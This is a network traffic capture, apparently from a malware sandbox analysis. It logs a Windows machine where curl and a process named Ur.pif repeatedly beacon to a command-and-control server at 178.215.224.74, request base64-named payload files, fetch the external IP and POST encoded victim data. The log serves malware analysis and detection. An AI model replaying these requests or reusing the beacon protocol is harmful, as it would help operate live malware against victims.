Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 19:59:39.210114956 CET | 98 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
    Host: 178.215.224.252
    User-Agent: curl/7.83.1
    Accept: */*


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49804 | 178.215.224.74 | 80 | 6692 | C:\Windows\SysWOW64\curl.exe

Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 20:00:06.814177036 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
    Host: 178.215.224.74
    User-Agent: curl/7.83.1
    Accept: */*
Nov 21, 2024 20:00:08.171070099 CET | 203 | IN | HTTP/1.1 200 OK
    Date: Thu, 21 Nov 2024 19:00:07 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Cache-Control: no-store, no-cache, must-revalidate
    Content-Length: 4
    Content-Type: text/html; charset=UTF-8
    Data Raw: 62 68 6c 6f
    Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        2 | 192.168.2.4 | 49807 | 178.215.224.74 | 80 | 6024 | C:\Windows\SysWOW64\curl.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:00:08.516844988 CET | 97 | OUT | GET /v10/ukyh.php?jspo=5 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:09.825196981 CET | 199 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:09 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        3 | 192.168.2.4 | 49813 | 178.215.224.74 | 80 | 2060 | C:\Windows\SysWOW64\curl.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:00:10.153579950 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:11.456861973 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:11 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        4 | 192.168.2.4 | 49819 | 178.215.224.74 | 80 | 3916 | C:\Windows\SysWOW64\curl.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:00:11.828119993 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:13.182924032 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:12 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        5 | 192.168.2.4 | 49821 | 178.215.224.74 | 80 | 5932 | C:\Windows\SysWOW64\curl.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:00:13.489723921 CET | 118 | OUT | GET /v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:14.911429882 CET | 1236 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:14 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Vary: Accept-Encoding
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        6 | 192.168.2.4 | 49831 | 178.215.224.74 | 80 | 5448 | C:\Windows\SysWOW64\curl.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:00:16.492132902 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:17.796339035 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:17 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        7 | 192.168.2.4 | 49835 | 178.215.224.74 | 80 | 6012 | C:\Windows\SysWOW64\curl.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:00:18.164597034 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:19.486316919 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:19 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        8 | 192.168.2.4 | 49838 | 178.215.224.74 | 80 | 2124 | C:\Windows\SysWOW64\curl.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:00:20.264441967 CET | 118 | OUT | GET /v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:21.784399986 CET | 1236 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:21 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Vary: Accept-Encoding
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        9 | 192.168.2.4 | 49854 | 178.215.224.74 | 80 | 2336 | C:\Windows\SysWOW64\curl.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:00:26.193878889 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:27.456290960 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:27 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        10 | 192.168.2.4 | 49859 | 178.215.224.74 | 80 | 6192 | C:\Windows\SysWOW64\curl.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:00:27.837408066 CET | 98 | OUT | GET /v10/ukyh.php?jspo=31 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:29.194426060 CET | 230 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:28 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 30
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45
                                        Data Ascii: 9A5605DE11447A0E2031624EE8FBDE


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        11 | 192.168.2.4 | 49870 | 178.215.224.74 | 80 | 6264 | C:\Windows\SysWOW64\curl.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:00:32.550404072 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:33.851232052 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:33 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        12 | 192.168.2.4 | 49874 | 178.215.224.74 | 80 | 2476 | C:\Users\user\AppData\Local\Temp\139918\Ur.pif
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:00:34.071444988 CET | 919 | OUT | POST /v10/ukyh.php HTTP/1.1
                                        Accept: text/*
                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 625
                                        Cache-Control: no-cache
                                        Data Ascii: jspo=34&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=[TRUNCATED]
                                        Nov 21, 2024 20:00:35.392931938 CET | 199 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:35 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        13 | 192.168.2.4 | 49878 | 178.215.224.74 | 80 | 5828 | C:\Windows\SysWOW64\curl.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:00:35.630002975 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:36.887707949 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:36 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        14          192.168.2.4  49884        178.215.224.74  80                5172  C:\Windows\SysWOW64\curl.exe
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 21, 2024 20:00:37.458591938 CET  97                 OUT        GET /v10/ukyh.php?jspo=7 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:38.762130976 CET  299                IN         HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:38 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Vary: Accept-Encoding
                                        Content-Length: 76
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 57 30 42 64 57 55 68 66 57 30 42 56 57 55 4a 56 5a 6d 4e 75 63 57 64 5a 51 6c 31 6b 61 57 52 78 5a 31 74 43 58 56 4a 6c 64 6d 56 75 64 32 31 47 5a 58 5a 70 59 57 64 7a 4c 6d 64 34 5a 53 6f 7a 57 30 68 64 4d 7a 49 71 57 30 4a 64
                                        Data Ascii: W0BdWUhfW0BVWUJVZmNucWdZQl1kaWRxZ1tCXVJldmVud21GZXZpYWdzLmd4ZSozW0hdMzIqW0Jd


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        15          192.168.2.4  49889        178.215.224.74  80                4476  C:\Windows\SysWOW64\curl.exe
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 21, 2024 20:00:39.184595108 CET  97                 OUT        GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:40.498481035 CET  203                IN         HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:40 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        16          192.168.2.4  49893        178.215.224.74  80                772   C:\Windows\SysWOW64\curl.exe
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 21, 2024 20:00:40.852935076 CET  105                OUT        GET /v10/ukyh.php?jspo=10&melq=1 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:42.165889025 CET  328                IN         HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:41 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Vary: Accept-Encoding
                                        Content-Length: 104
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 55 6d 56 32 5a 32 5a 33 5a 55 52 74 64 47 74 72 5a 58 45 73 5a 33 70 6e 4b 46 4a 6e 66 6d 31 73 64 32 56 47 5a 58 5a 70 59 32 56 7a 4c 47 31 36 5a 53 6f 32 4b 44 4d 71 4b 6d 41 30 4f 44 64 67 4e 57 6f 31 4d 7a 59 7a 4e 6d 41 30 4d 44 63 31 4e 6d 59 30 4d 6d 45 78 5a 6d 63 39 4f 6d 59 34 4f 7a 73 37 49 6a 41 3d
                                        Data Ascii: UmV2Z2Z3ZURtdGtrZXEsZ3pnKFJnfm1sd2VGZXZpY2VzLG16ZSo2KDMqKmA0ODdgNWo1MzYzNmA0MDc1NmY0MmExZmc9OmY4Ozs7IjA=


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        17          192.168.2.4  49897        178.215.224.74  80                4280  C:\Windows\SysWOW64\curl.exe
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 21, 2024 20:00:42.757563114 CET  97                 OUT        GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:44.111241102 CET  203                IN         HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:43 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        18          192.168.2.4  49903        178.215.224.74  80                6696  C:\Windows\SysWOW64\curl.exe
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 21, 2024 20:00:44.447386026 CET  97                 OUT        GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:45.808995008 CET  203                IN         HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:45 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        19          192.168.2.4  49909        178.215.224.74  80                1508  C:\Windows\SysWOW64\curl.exe
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 21, 2024 20:00:46.195420980 CET  128                OUT        GET /v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:47.715118885 CET  1236               IN         HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:47 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Vary: Accept-Encoding
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        20          192.168.2.4  49925        178.215.224.74  80                1696  C:\Windows\SysWOW64\curl.exe
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 21, 2024 20:00:54.483695030 CET  97                 OUT        GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:55.794033051 CET  203                IN         HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:55 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        21          192.168.2.4  49930        178.215.224.74  80                5632  C:\Windows\SysWOW64\curl.exe
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 21, 2024 20:00:56.286088943 CET  93                 OUT        GET /v10/ukyh.php?gi HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:57.611834049 CET  211                IN         HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:57 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 11
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                        Data Ascii: 8.46.123.75


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        22          192.168.2.4  49936        178.215.224.74  80                428   C:\Windows\SysWOW64\curl.exe
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 21, 2024 20:00:58.415659904 CET  97                 OUT        GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:59.779395103 CET  203                IN         HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:59 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        23          192.168.2.4  49941        178.215.224.74  80                2476  C:\Users\user\AppData\Local\Temp\139918\Ur.pif
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 21, 2024 20:01:00.217163086 CET  531                OUT        POST /v10/ukyh.php HTTP/1.1
                                        Accept: text/*
                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 237
                                        Cache-Control: no-cache
                                        Data Raw: 6a 73 70 6f 3d 34 33 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 4d 54 41 74 4d 44 35 5a 51 46 31 4c 52 6c 6c 49 58 54 6f 73 4e 6a 51 73 4d 7a 49 78 4a 6a 38 33 57 55 42 66 4d 54 41 75 4d 44 45 33 4d 6a 67 79 57 30 42 64 51 54 68 63 56 58 46 6c 63 6e 4e 65 61 6d 64 75 5a 33 46 63 51 58 4a 77 52 6d 4e 32 59 56 35 4f 62 57 4e 68 62 46 35 63 5a 32 31 77 56 44 4d 78 4d 54 6b 7a 4f 6c 35 58 63 43 78 77 61 32 35 54 51 6c 39 44 4f 46 78 56 63 32 56 79 63 31 35 69 62 57 35 6c 63 31 35 44 63 48 42 47 59 58 52 68 58 6b 78 6e 59 32 4e 75 58 46 52 6e 62 58 4a 65 4d 7a 4d 37 4f 7a 4d 34 58 46 56 77 4a 6e 4a 70 5a 67 25 33 44 25 33 44
                                        Data Ascii: jspo=43&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=MTAtMD5ZQF1LRllIXTosNjQsMzIxJj83WUBfMTAuMDE3MjgyW0BdQThcVXFlcnNeamduZ3FcQXJwRmN2YV5ObWNhbF5cZ21wVDMxMTkzOl5XcCxwa25TQl9DOFxVc2Vyc15ibW5lc15DcHBGYXRhXkxnY2NuXFRnbXJeMzM7OzM4XFVwJnJpZg%3D%3D
                                        Nov 21, 2024 20:01:01.533435106 CET  199                IN         HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:01 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                        24          192.168.2.4  49945        178.215.224.74  80
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 21, 2024 20:01:01.734539032 CET  97                 OUT        GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:03.043689966 CET  203                IN         HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:02 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                        25          192.168.2.4  49951        178.215.224.74  80
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 21, 2024 20:01:04.090903997 CET  134                OUT        GET /v10/ukyh.php?jspo=33&jwvs=9A5605DE11447A0E2031624EE8FBDE HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:05.378820896 CET  240                IN         HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:05 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 40
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 4d 53 70 53 5a 33 35 6e 62 6e 56 74 52 6d 64 2b 61 57 46 6e 63 53 78 6e 65 6d 56 43 53 47 35 6a 62 6e 4e 6e 51 44 45 3d
                                        Data Ascii: MSpSZ35nbnVtRmd+aWFncSxnemVCSG5jbnNnQDE=


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                        26          192.168.2.4  49955        178.215.224.74  80
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 21, 2024 20:01:05.948683977 CET  97                 OUT        GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:07.275743961 CET  203                IN         HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:07 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                        27          192.168.2.4  49961        178.215.224.74  80
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 21, 2024 20:01:08.090935946 CET  140                OUT        GET /v10/ukyh.php?jspo=3&jwvs=9A5605DE11447A0E2031624EE8FBDE&vprl=2 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:09.340446949 CET  199                IN         HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:09 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                        28          192.168.2.4  49972        178.215.224.74  80
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 21, 2024 20:01:12.497273922 CET  97                 OUT        GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:13.855789900 CET  203                IN         HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:13 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                        29          192.168.2.4  49978        178.215.224.74  80
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 21, 2024 20:01:14.825248003 CET  175                OUT        GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:16.134665966 CET  207                IN         HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:15 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 4e 33 78 32 62 57 46 6d
                                        Data Ascii: N3x2bWFm


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                        30          192.168.2.4  49984        178.215.224.74  80
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 21, 2024 20:01:17.637731075 CET  97                 OUT        GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:18.887870073 CET  203                IN         HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:18 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                        31          192.168.2.4  49985        178.215.224.74  80
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 21, 2024 20:01:17.653348923 CET  97                 OUT        GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:19.021061897 CET  203                IN         HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:18 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        32          192.168.2.4  49986        178.215.224.74  80                2476  C:\Users\user\AppData\Local\Temp\139918\Ur.pif
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 21, 2024 20:01:19.232234955 CET  821                OUT        POST /v10/ukyh.php HTTP/1.1
                                        Accept: text/*
                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 527
                                        Cache-Control: no-cache
